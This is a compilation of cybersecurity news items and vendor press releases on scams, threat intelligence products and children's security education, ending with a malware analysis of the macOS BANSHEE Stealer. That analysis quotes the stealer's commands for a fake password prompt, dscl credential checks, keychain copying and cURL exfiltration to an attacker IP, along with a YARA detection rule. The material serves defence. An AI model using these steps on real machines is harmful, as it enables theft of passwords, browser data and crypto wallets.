Gen experts warn that it is more important than ever to stay vigilant as cybercriminals increasingly use generative AI to create sophisticated scams using voices, images and videos to make their schemes more convincing. Attackers are using celebrities, global events, and brands as shiny lures. And as more people find themselves navigating economic hardships, the promise of easy money through phony investments, cryptocurrency giveaways and part-time job offers has also become a timely hook for scammers preying upon unsuspecting victims seeking financial security.

“We continue to see cybercriminals expand their toolkits with even more uses of AI to strengthen their attacks,” said Siggi Stefnisson, Chief Technology Officer at Gen.

“Scammers are cunning and adept at exploiting what is most likely to be on consumers’ minds – whether it has to do with elections, love or financial security. Now with AI and other new tech, their schemes are more sophisticated and convincing than ever before. We urge consumers to stay informed and alert. We will continue to keep a watchful eye on the latest threats and provide the latest knowledge and tools needed to be safer despite the evolving threat landscape.”

Gen has one of the world’s largest consumer Cyber Safety networks protecting people around the globe against advanced online threats. Throughout Q2, Gen Cyber Safety brands blocked over one billion unique attacks each month, up 46% compared to last year. Interestingly, a staggering 95% of attacks happen while people use their browser and surf the web. In addition to blocking threats directly as part of our customers’ products and services, Gen researchers discovered and reported security vulnerabilities so that they could be patched by other companies, helping protect people from further attacks.

Gen experts shared some of the most prevalent threats to watch for based on this quarter’s findings:

Scammers’ Playbook: New and Revamped Tactics
The accessibility and rise of AI allow cybercriminals to add a modern twist to their old tricks to lure more victims. We have seen bad actors using deepfakes of celebrities to promote fake cryptocurrency investment schemes, and now, scammers are targeting widely publicized events that will be broadcast live to draw a large audience.

For example, recently, scam group CryptoCore lured victims with highly convincing deepfakes of official events disseminated on compromised YouTube accounts and used QR codes to direct victims to fake crypto giveaway campaigns, stealing $5 million. During the SpaceX Starship integrated flight test (IFT-4) in June, nearly 50 YouTube accounts were hijacked, and the campaign resulted in 500 transactions amounting to a total value of $1.4 million. Gen products helped protect thousands of people from this threat in Q2, with the largest amounts in the US, UK, Brazil and Germany.

Amid challenging economic conditions, scammers are capitalizing on consumers’ needs with part-time job scams that promise quick money by completing simple tasks, like promoting goods on social media. Once trust is established, the scammers convince their victim to send them money so they can steal it. These scams have now evolved from text-based interactions on Telegram to more sophisticated AI-generated voice communications, adding a whole new layer of deception and realism.

This quarter saw the revival of the classic antivirus scam that was first popular in the late 2000s, when cybercriminals were making millions of dollars by selling fake antivirus products. Nowadays, cybercriminals deploy aggressive pop-up alerts that mimic real antivirus programs, often claiming the computer is infected to urge immediate action. These fake alerts abuse the Windows notification system to appear as credible system messages to scare the person into purchasing antivirus software so the scammers can earn commissions through third-party referral programs.

Digital Identity Theft: The New Gold Rush
As large-scale company breaches seemingly become the norm in 2024, cybercriminals turn an eye toward stealing digital identities. Attackers are using direct methods such as Information Stealers (InfoStealers) and Mobile Bankers, going beyond buying data on the Dark Web to snap up consumers’ valuable personal information.

InfoStealers breach devices to steal login details, session cookies, passwords and financial information. While InfoStealers saw a slight decline in Q2/2024, notable malware families continue to grow, with the most dominant AgentTesla increasing its market share by 11 %.

Mobile bankers, on the other hand, specifically target mobile devices to steal banking details, cryptocurrency wallets, and instant payments credentials. In Q2/2024, Bankers such as TeaBot, disguised as a PDF reader, targeted Revolut customers. Meanwhile, spyware threats such as XploitSpy and AridSpy are sneaking onto the PlayStore, stealing files and monitoring users through their cameras and microphones.

Norton LifeLock provides a 12-step guide to help people if they believe their identity may have been compromised.

On the Rise: Consumer Ransomware
Consumers remain an attractive target for ransomware as they often have less protection in place than large companies. According to Gen telemetry, there was a 24% rise quarter over quarter in consumer ransomware attacks in Q2/2024. India saw a staggering 379% increase, followed by notable spikes in the United States, Canada and the United Kingdom.

A popular delivery technique is to hide ransomware payload in pirated content. Even though some operators of major ransomware gangs like LockBit have been brought to justice in the last quarter, Gen urges consumers to take precautions to keep their data safe, such as doing regular back-ups.

Gen researchers collaborate with governments across the globe to combat ransomware by providing free decryption tools for victims, and most recently released the  Avast DoNex Ransomware Decryptor.

To read the full Q2/2024 Gen Threat Report, visit: https://www.gendigital.com/blog/news/innovation/q2-2024-threat-report

This marks the inaugural Gen Threat Report. Previously, Gen brands separately reported quarterly threat news with the Norton Pulse Report and Avast Quarterly Threat Report. The Gen Threat Report now offers a comprehensive look at the rising threats we monitor and protect our customers from each day and trends we see across the threat landscape.

About Gen
Gen™ (NASDAQ: GEN) is a global company dedicated to powering Digital Freedom through its trusted Cyber Safety brands, Norton, Avast, LifeLock, Avira, AVG, ReputationDefender and CCleaner. The Gen family of consumer brands is rooted in providing safety for the first digital generations. Now, Gen empowers people to live their digital lives safely, privately, and confidently today and for generations to come. Gen brings award-winning products and services in cybersecurity, online privacy and identity protection to nearly 500 million users in more than 150 countries. Learn more at GenDigital.com. 

The takedown service weaves together Infoblox’s validation, mitigation, monitoring, and reporting features by using DNS to track, identify, confirm and remove websites.

Infoblox leverages rapid escalation, its DNS, and threat intelligence expertise, backed by its relationships with Australian and global internet service providers (ISPs), telcos, and domain administrators to achieve this.

This service can also track and remove stolen proprietary information – including access credentials, personally identifiable information, and credit card data – from online forums or fraudulent hosts.

{loadposition kenn}

Further, it can confirm the existence of potential malware and remove malicious files from organisations’ legitimate websites.

The services come as the Australian Competition and Consumer Commission’s (ACCC) National Anti-Scam Centre reported that Australians lost $2.74 billion to scams including investment, identity theft, and online shopping scams in 2023.

The companies devised the takedown service as more fraudulent websites are targeting Australians with investment scams.

This led the government to “boost work by the Australian Securities and Investments Commission to identify and take down investment scam websites.”

Baidam CEO Jack Reis says fraudulent domains are a rising threat for any organisation – from sole traders to major enterprises – but indigenous and regional businesses could be particularly vulnerable to internet fraud.

The ACCC report highlighted First Nations people reported almost double the number of scams in 2023 compared with 2022.

“There are parts of Australia where the internet is very new, or not available yet at all,” said Reis.

“It’s one of the most important resources we can bring to the bush, but lack of experience and education on cybersecurity and online scams can leave indigenous people and businesses more vulnerable.”

“Together with Infoblox, we’re committed to helping organisations across Australia maintain a secure and trustworthy online presence and quickly mitigate the impact of fraudulent or lookalike websites.”

Baidam Takedown Services operate out of the company’s Gundan Security Operations Centre (SOC) in Brisbane, Australia’s first indigenous-designed and managed SOC.

The centre was opened by Minister for Cyber Security Clare O’Neil and was built using an Indigenous co-design methodology. Baidam provides training and experience that offers pathways for First Nations people to become cyber leaders.

Infoblox Australia and New Zealand managing director Scott Morris said internet fraud can be the spark that ignites other malicious activity, including ransomware, as stolen credentials taken through fake websites, imitated multi-factor authentication (MFA) and phishing campaigns that are often used to conduct these attacks.

“We’re seeing internet fraud playing a more prominent role in how cybercriminals infiltrate organisations in Australia,” said Morris.

“Our takedown service helps companies neutralise fraudulent domains impersonating them for criminal activities. While blocking malicious domains should be a priority for every user, this takedown service lets companies become proactive in defending their good name and customers.”

Baidam’s Infoblox-supported Takedown Services are available across Australia now. Organisations can purchase or pre-purchase “packs” of takedowns for current or future suspected fraudulent websites and domains.

KnowBe4, the provider of the world’s largest security awareness training and simulated phishing platform, announced its latest release of the KnowBe4 Children’s Interactive Cybersecurity Activity Kit. In an increasingly digital world, cybersecurity education for children is more crucial than ever. This kit, aimed at students under the age of 16, provides essential tools and resources to help keep children safe online and is available at no-charge.

The kit includes an AI safety video, a password video game, a cybersecurity activity book, and middle school lesson plans. The kit also includes a Roblox game called KnowBe4 Hack-A-Cat, which teaches students about things like phishing, ransomware, and other cybersecurity-related topics. 

This year, KnowBe4 has added a lesson “Hack-A-Cat: Your Cybersecurity Adventure on Roblox”, to accompany the game and assist educators in explaining concepts contained in it in a more direct way. The module can be completed by students in their own time or used as a lesson in the classroom by teachers. 

"We are committed to continually improving our cybersecurity education resources for children," said John Just, chief learning officer at KnowBe4. "The excitement around our Roblox game prompted educators to request an accompanying lesson. We're thrilled to add this to our Children's Kit, enhancing its value for students worldwide. These updates reflect our dedication to providing engaging, relevant, and effective cybersecurity training for children."

In addition to the new module, the kit also has a new feature. Users are now able to download its content in a common standard called Sharable Content Object Reference Model (SCORM) and use it as part of their own Learning Management Systems (LMS) and / or Virtual Learning Environments (VLE). 

Modules available include:

• AI Awareness for Students
• Bye Bye Bully 
• Captain Awareness: Conquer Internet Safety for Kids
• Password Zapper Game
• Spot the Phish - Kid's Edition

Supporting materials available in image and document formats available for download include:

• Clickbait Cootie Catcher Tabletop Exercise
• Password Warriors Tabletop Exercise
• Poster: Captain Awareness: Conquer Internet Safety for Kids
• Security Cat's Activity Book for Kids

KnowBe4 remains committed to expanding the Children's Kit and Student Edition throughout the school year, based on the latest threats and feedback from partner institutions.

The KnowBe4 Children’s Interactive Cybersecurity Activity Kit is freely available to students under the age of 16, schools, teachers, and parents here. 

“This internationally-recognised certification from CSA reaffirms CyberArk’s cloud security commitment to organisations across the world,” said Clarence Hinton, chief strategy officer at CyberArk. “CyberArk innovation goes beyond just-in-time access, offering zero standing privileges capabilities for multi-cloud environments. The identity security platform streamlines and safeguards workforce and high-risk user access, like developers, locks down endpoint privileges and protects human and machine credentials in all environments.”

CSA is the world’s leading organisation focused on defining and raising awareness about best practices to ensure a secure cloud computing environment. Organisations across the globe recognise the increasing urgency around securing their multi-cloud environments as well as the cloud-based solutions they consume. In a dynamic, AI-powered threat landscape, the Trusted Cloud Provider trustmark is a mark of CyberArk’s identity security leadership and our mission to enable customers to stay ahead of well-funded, innovative cyberattackers by rethinking and modernising the way in which we secure all identities, both human and machine, with intelligent privilege controls.

“Attaining the CSA Trusted Cloud Provider trustmark is a major accomplishment, showcasing an organisation’s commitment to upholding the highest standards in cloud security,” said Jim Reavis, co-founder and CEO of the Cloud Security Alliance. “CyberArk not only meets these stringent requirements but surpasses them, helping customers secure increasingly complex cloud environments.” 

This Scams Awareness Week, the ACMA warns the public to be on the lookout for love scams as scammers continue to target people by initiating contact to build a connection.

Scammers will contact people via different channels, including Instant Message on social media, WhatsApp, email, and SMS.

“They will then try and develop a relationship with you over time, pretending to be romantically or otherwise interested in you to gain your trust. These scams are designed to get you to provide money or personal information,” the ACMA said in a statement.

{loadposition kenn}

The ACMA gave the signs of a romance or relationship scam:

- Strangers may connect with someone and they may send a message that seems like an accident but introduce themselves and try to start a conversation.

- The contact becomes frequent and intimate – the scammer may contact multiple times a day and express strong feelings. They may ask to provide personal or intimate images that may be later used to coerce victims into paying them money.

- They ask victims to send or invest money. The scammer may claim that they need money due to an emergency or try to convince them to invest to make easy money.

- They try to get victims to click on a link to connect with them – these links will often have unusual or unfamiliar domain names and may lead to a fake website or contain malware designed to help steal victims’ personal or financial details.

The ACMA gave tips on how to protect victims:

- If one is unsure if a message or call is genuine, stop and check. Don’t rush to act.

- Do not give your personal information or send money to someone you haven’t met in person and don’t know.

- Do not click on any links in emails or texts. These may contain malware or may be phishing scams designed to steal your personal or financial details.

- Check in with family members and/or friends you trust to talk about any online request for money.

- If you think you’ve been scammed, contact your bank immediately to stop any payments and tell your telco.

 Nozomi Networks,says the federated solution helps strengthen and streamline the way industrial and enterprise CISOs and their teams anticipate, diagnose and respond to cyber threats across all their critical business operations.

“With the Nozomi TI Expansion Pack, Nozomi Networks customers now have the option to enrich Nozomi Networks threat intelligence with Mandiant Threat Intelligence to gain more comprehensive access to real-time information about threats to their IT, OT and IoT systems,” notes Nozomi.

“The cybersecurity threat landscape is rapidly evolving, with attacks growing in both number and impact enterprise-wide,” said Edgard Capdevielle, Nozomi Networks CEO.

{loadposition peter}

“To minimise risk and maximise operational resilience, CISOs and their security teams need comprehensive solutions that enable them to quickly assess and respond to threats across their IT, OT and IoT systems. We are pleased to be able to give our customers the option to easily incorporate Mandiant’s world-class threat intelligence as part of a whole solution that delivers superior security outcomes.”

“For nearly a decade, Mandiant and Nozomi Networks have partnered to deliver advanced, AI-powered OT and IoT security solutions to customers,” said Melissa Smith, Google Cloud’s Head of Strategy & Technology Partnerships.

“This latest expansion is another critical step in our journey to combine threat intelligence sources and defences to deliver the best possible security outcomes for the world’s critical infrastructure. By blending Mandiant’s threat intelligence and expertise with Nozomi Networks’ OT threat intelligence and tools, we can enable critical infrastructure organisations to enhance their threat intelligence and investigations for a stronger defence.”

According to Nozomi Networks customers who wish to gain comprehensive access to real-time information about threats to their IT, OT and IoT systems now have access to an i”ntegrated threat feed that combines the breadth and depth of Mandiant’s threat intelligence with Nozomi Networks’ industry-leading OT threat intelligence.

“ The Nozomi TI Expansion Pack extends Nozomi Networks’ advanced OT and IoT threat intelligence by providing organisations with a deeper understanding of the coinciding IT threat landscape. This makes it possible to holistically monitor and respond to emerging threats for the strongest possible security outcomes.

‘Vantage Threat Cards, also announced today, are a new presentation capability in Nozomi Vantage, the company’s cloud-based OT/IoT cyber management console. Vantage Threat Cards revolutionise the way users access and derive value from threat intelligence feeds. These cards logically cluster and organise threat data, offering instant access to critical information such as:

• Threat descriptions
• First and last seen dates
• Exploitation status and vectors
• Targeted industries and countries
• MITRE ATT&CK details
• Mitigation suggestions
• And more

Nozomi says users can swiftly narrow down threats by filtering based on specific countries and regions, ensuring they receive the most relevant information for their needs.

“Vantage Threat Cards empower OT and IoT cyber teams to quickly scan and filter key threat information, significantly speeding up response times and enhancing accuracy. Analysts can easily input an IP address, domain name, hash, or threat actor alias to identify any associated rules, streamlining the identification process. The integration of Mandiant Threat Intelligence will be used throughout the Vantage solution to enhance our offering even further. ” Updates to the vulnerability data include:

• Improved CVSS mapping
• Detailed summaries
• Lists of vulnerable products
• Exploitation details
• MITRE ATT&CK detailsWorkarounds and vendor fixes
• Links back to Threat Cards and malware groups

Nozomi notes that these enhancements ensure comprehensive coverage and deeper insights into vulnerabilities, enabling more effective threat management - and the TI Expansion Pack is available now for customers using Nozomi on-premises and cloud-based monitoring solutions, while Vantage customers have the added benefit of accessing the new threat intelligence feed through Nozomi Threat Cards.

The Nozomi TI Expansion Pack and Vantage Threat Intelligence Cards are available now. Sign up for our webinar to get more information. 

Elastic says the collaboration with LangChain, has been core to the development of Elastic Security features—Automatic Import, Attack Discovery and Elastic Assistant for Security—on the  Elastic Search AI Platform. - with the features streamlining user migration to AI-driven security analytics and expediting security operations workflows.

"Working with Elastic has been amazing in so many ways. The Elastic AI Assistant for Security, powered by LangChain's standard large language model (LLM) interfaces and instrumented using LangSmith, has successfully deployed to production, reaching hundreds of users,” said Erick Friis, founding engineer at LangChain.

“Elastic is also using LangGraph to build more controllable agents. It's inspiring to see how our shared users have embraced similar retrieval workflows on their Elastic deployments.”

{loadposition peter}

Elastic Security notes that the integration with LangChain leverages two key components:

LangChain and LangGraph provide the necessary tools for building applications that require context-aware reasoning, such as:
· Enhancing Elastic AI Assistant’s ability to understand and react to complex security scenarios and generate queries
· Attack Discovery’s ability to identify and describe attacks
· Automatic Import’s ability to craft an accurate  data integration based on sample data

Users have the freedom to integrate the generative AI features of Elastic Security with their LLM of choice. With the Elastic Open Inference API and LangChain’s extensive chat model ecosystem,  Elastic is quickly expanding customers’ LLM options.

“Elastic is focused on delivering innovative AI features for security teams to accelerate their migration from legacy SIEM and free up teams from traditionally time-consuming, complex and mundane tasks,” said Mike Nichols, vice president of product, Security at Elastic.

“Through our close relationship with LangChain and integrations with LangGraph and LangSmith, we’ve created features that give valuable time back to security practitioners.”

Read the Elastic blog for more information on Elastic’s work with LangChain.

About Elastic

Elastic (NYSE: ESTC), the Search AI Company, enables everyone to find the answers they need in real-time using all their data, at scale. Elastic’s solutions for search, observability and security are built on the Elastic Search AI Platform, the development platform used by thousands of companies, including more than 50% of the Fortune 500. Learn more at elastic.co. 

The Australian Communications and Media Authority (ACMA) notes in its Scam Alert that if you’ve identified or encountered a scam, report it to www.scamwatch.gov.au,, and then tell someone – a friend, family, colleague or someone in your social circle.

“By sharing your story, you can help to prevent someone else from having their money or personal information taken by a scammer,” cautions ACMA:

Remember to:

• Stop: Don’t give money or personal information to anyone if unsure. Say no, hang up, delete.
• Check: Scammers pretend to be from organisations you know and trust – like myGov, your bank, the police or government. If you’re unsure, contact the organisation using details you’ve looked up yourself via an official website or app.
• Report: The more we talk, the less power they have. Report scams to scamwatch.gov.au when you see them.

Scams Awareness Week is an annual campaign hosted by the ACCC and the Scams Awareness Network and supported by the ACMA. It raises awareness about common scams and offers tips on how people can protect themselves from scammers.

Keep an eye on our Facebook, X and LinkedIn channels this week as we share tips on how to protect yourself from scams. You can also visit the Scams Awareness Week website for more information.

Google and CSIRO will develop tools and frameworks that help Australian CI operators meet critical obligations around software supply chain security, including those in the amended Security of Critical Infrastructure (SOCI) Act and Australia’s Cyber Security Strategy.

The partnership is a part of Google’s Digital Future Initiative and CSIRO’s Critical Infrastructure Protection and Resilience developing mission.

The tools and frameworks will focus on identifying and fixing vulnerabilities in open source software components that have become an increasingly important part of digital transformation for Australia’s critical infrastructure, which includes everything from public utilities and hospitals to freight networks and groceries.

{loadposition kenn}

All project findings will be publicly available, allowing critical infrastructure sectors free and easy access.

CSIRO project lead Dr Ejaz Ahmed says the creation of new and homegrown technologies will enhance the security of software used in Australian critical infrastructure.

“Software developed, procured, commissioned, and maintained within Australia will also be better aligned with local regulations, promoting greater compliance and trustworthiness,” Dr Ahmed says.

“This partnership builds upon a successful track record of AI-powered innovation, demonstrating the transformative power of Google and CSIRO's expertise.”

A roadmap to more secure software
The partnership will see CSIRO work with the Google Open Source Security Team (GOSST) and Google Cloud to develop novel AI-powered tools for automated vulnerability scanners and data protocols that can quickly and precisely identify and assess the impact of open source vulnerabilities on Australian CI operators’ software supply chains.

The tools will tap on existing resources including Google’s OSV database for the most up-to-date intelligence on vulnerabilities. CSIRO’s applied research, including methods to test for responsible AI usage and tools for analysing software packages, will help to ensure reports and recommendations directly address the local regulatory and operating context of Australian operators.

Similarly, CSIRO and Google will collaborate on designing a secure framework that gives Australian CI operators clear guidance on how to meet current requirements and a baseline for future ones.

The framework will adapt and extend the Supply-chain Levels for Software Artifacts (SLSA) framework created by Google, with insight from CSIRO’s Australian industry practices, to define multiple levels of software supply chain maturity as well as steps to achieve each one.

Google Cloud will provide solutions, including machine learning and Big Data capabilities as well as domain-specific large language models, to accelerate the partnership’s research and translate it into tools or as-a-service offerings for CI operators.

“Software supply chain vulnerabilities are a global issue, and Australia has led the way in legislative measures to control and combat the risks," says Google Cloud security practice lead ANZ Stefan Avgoustakis.

“The tools and frameworks we’re developing will give Australia’s CI operators a clear and consistent roadmap towards software supply chain maturity, based on the in-depth industry knowledge that CSIRO has built up over years of research. Making these resources openly available to CI operators will help establish greater resilience throughout critical infrastructure nationwide, and reflects our longstanding interest in teaming up with industry and academia to enhance the effectiveness of our years of work in open source security.”

Preamble

In August 2024, a novel macOS malware named "BANSHEE Stealer" emerged, catching the attention of the cybersecurity community. Reportedly developed by Russian threat actors, BANSHEE Stealer was introduced on an underground forum and is designed to function across both macOS x86_64 and ARM64 architectures.

This malware presents a severe risk to macOS users, targeting vital system information, browser data, and cryptocurrency wallets.

With a steep monthly subscription price of $3,000, BANSHEE Stealer stands out in the market, particularly compared to known stealers like AgentTesla.

As macOS increasingly becomes a prime target for cybercriminals, BANSHEE Stealer underscores the rising observance of macOS-specific malware. This analysis explores the technical details of BANSHEE Stealer, aiming to help the community understand its impact and stay informed about emerging threats.

Key takeaways

• BANSHEE Stealer highlights the growing number of macOS malware samples as the OS becomes a more attractive target for cyber threats.
• BANSHEE Stealer's $3,000 monthly price is notably high compared to Windows-based stealers.
• BANSHEE Stealer targets a wide range of browsers, cryptocurrency wallets, and around 100 browser extensions, making it a highly versatile and dangerous threat.

Malware Analysis 

The malware we analysed in this research contained all the C++ symbols, which is interesting as we can guess the project's code structure by knowing these source code file names, as seen in the picture below. Looking into the C++-generated global variable initialisation functions, we can find values set automatically/manually by the user during the build process, like the remote IP, encryption key, build ID, etc.

 

Functions list that initialise the global variables of every source file 

The following table summarises the leaked .cpp file names through the symbols in the binary.

File name	Description
Controller.cpp	Manages core execution tasks, including anti-debugging measures, language checks,data collection, and exfiltration.	Debugger, VM Detection, and Language Checks
Browsers.cpp	Handles the collection of data from various web browsers.
System.cpp	Executes AppleScripts to gather system information and perform password phishing.
Tools.cpp	Provides utility functions for encryption, directory creation, and compression etc.
Wallets.cpp	Responsible for collecting data from cryptocurrency wallets.

 

 

 Checking for debugging, Virtualisation, and the language of the machine

 

BANSHEE Stealer uses basic techniques to evade detection. It detects debugging by utilising the sysctl API.

 Debugging detection with sysctl macOS API

For virtualisation detection, it runs the command system_profiler SPHardwareDataType | grep 'Model Identifier' to determine whether the string Virtual appears in the hardware model identifier, which suggests a virtual machine. These methods are relatively simple and can be easily circumvented by advanced sandboxes and malware analysts.

Virtual machine check

Additionally, It parses the user-preferred canonicalised language returned from the CFLocaleCopyPreferredLanguages API and looks for the string ru. This tactic helps the malware avoid infecting systems where Russian is the primary language.

System information collection 

User password 

The malware creates an Osascript password prompt with a dialog saying that to launch the application, you need to update the system settings. Please enter your password.

When the user enters the password, it will be validated using the dscl command by running dscl Local/Default -authonly <username> <password>

If valid, the password will be written to the following file /Users/<username>/password-entered.

User password phishing through a prompt

These credentials can be leveraged to decrypt the keychain data stored on the system, granting access to all saved passwords.

File, software, and hardware information collection 

The function System::collectSystemInfo collects system information and serialises it in a JSON object. It executes the command system_profiler SPSoftware DataType SPHardwareDataType, which provides details about the system’s software and hardware. It gets the machine's public IP by requesting it from freeipapi.com through the built-in macOS cURL command.

The JSON file will be saved under <temporary_path>/system_info.json

BANSHEE stealer executes AppleScripts; interestingly, it writes the AppleScripts to the same file /tmp/tempAppleScript.

The first script to be executed first mutes the system sound with osascript -e 'set volume with output muted' command. It then collects various files from the system, which are listed below:

• Safari cookies
• Notes database
• Files with the following extensions .txt, .docx, .rtf, .doc, .wallet, .keys, or .key from the Desktop and Documents folders.

Dump keychain passwords 

It copies the keychain of the system /Library/Keychains/login.keychain db to <temporary_path>/Passwords

Browser collection 

BANSHEE collects data from 9 different browsers currently, including browser history, cookies, logins, etc:

• Chrome
• Firefox
• Brave
• Edge
• Vivaldi
• Yandex
• Opera
• OperaGX

Regarding Safari, only the cookies are collected by the AppleScript script for the current version.

Web browser file collection

Additionally, data from approximately 100 browser plugins are collected from the machine. A list of these extension IDs is provided at the end of the blog post.

The collected files are saved under <temporary_path>/Browsers.

Wallet collection

• Exodus
• Electrum
• Coinomi
• Guarda
• Wasabi Wallet
• Atomic
• Ledger

The collected wallets are stored under <temporary_path>/Wallets.

Exfiltration 

After the malware finishes collecting data, it first ZIP compresses the temporary folder using the ditto command. The zip file is then XOR encrypted and base64 encoded and sent through a post request to the URL: https://45.142.122[.]92/send/ with the built-in cURL command.

Xor and base64 encoding of the zip file to be exfiltrated

 Behavior detection

• Crypto Wallet File Access by Unsigned or Untrusted Binary
• Web Browser Credential Data Accessed by Unsigned or Untrusted Process
• Osascript Payload Drop and Execute
• Potential Credentials Phishing via Osascript

YARA rule

Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the BANSHEE malware:

rule Macos_Infostealer_Banshee {

    meta:

        author = "Elastic Security"

        creation_date = "2024-08-13"

        last_modified = "2024-08-13"

        os = "MacOS"

        arch = "x86, arm64"

        category_type = "Infostealer"

        family = "Banshee"

        threat_name = "Macos.Infostealer.Banshee"

        license = "Elastic License v2"

    strings:

        $str_0 = "No debugging, VM, or Russian language detected." ascii fullword

        $str_1 = "Remote IP: " ascii fullword

        $str_2 = "Russian language detected!" ascii fullword

        $str_3 = " is empty or does not exist, skipping." ascii fullword

        $str_4 = "Data posted successfully" ascii fullword

        $binary_0 = { 8B 55 BC 0F BE 08 31 D1 88 08 48 8B 45 D8 48 83 C0 01 48 89 45 D8 E9 }

        $binary_1 = { 48 83 EC 60 48 89 7D C8 48 89 F8 48 89 45 D0 48 89 7D F8 48 89 75 F0 48 89 55 E8 C6 45 E7 00 }

    condition:

        all of ($str_*) or all of ($binary_*)

     }

Conclusion 

BANSHEE Stealer is macOS-based malware that can collect extensive data from the system, browsers, cryptocurrency wallets, and numerous browser extensions. Despite its potentially dangerous capabilities, the malware's lack of sophisticated obfuscation and the presence of debug information make it easier for analysts to dissect and understand. While BANSHEE Stealer is not overly complex in its design, its focus on macOS systems and the breadth of data it collects make it a significant threat that demands attention from the cybersecurity community.